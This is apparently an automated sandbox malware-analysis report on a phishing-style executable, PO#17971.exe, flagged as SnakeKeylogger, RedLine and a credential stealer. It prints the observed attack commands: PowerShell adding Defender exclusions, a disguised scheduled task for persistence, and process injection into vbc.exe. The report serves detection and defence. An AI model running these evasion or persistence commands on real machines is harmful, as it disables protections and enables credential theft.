Source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO#17971.exe.3e94d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.PO#17971.exe.3ce5100.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PO#17971.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TZRtlifudvO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

9_2_004019F0

Source: C:\Users\user\Desktop\PO#17971.exe

File created: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Mutant created: \Sessions\1\BaseNamedObjects\ssTcHqiraJnP
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03

Source: C:\Users\user\Desktop\PO#17971.exe

File created: C:\Users\user\AppData\Local\Temp\tmp55D6.tmp

Jump to behavior

Source: PO#17971.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO#17971.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\PO#17971.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO#17971.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vbc.exe, 00000009.00000002.4513884239.0000000007450000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007482000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007432000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007442000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007475000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006CF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006CB1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006CA1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO#17971.exe	ReversingLabs: Detection: 42%
Source: PO#17971.exe	Virustotal: Detection: 41%

Source: PO#17971.exe

String found in binary or memory: ]http://docs.livestreamer.io/plugin_matrix.html#Supported pluginsQhttp://docs.livestreamer.io/players.html#Supported playersQhttp://docs.livestreamer.io/install.html

Source: C:\Users\user\Desktop\PO#17971.exe

File read: C:\Users\user\Desktop\PO#17971.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO#17971.exe "C:\Users\user\Desktop\PO#17971.exe"
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe C:\Users\user\AppData\Roaming\TZRtlifudvO.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
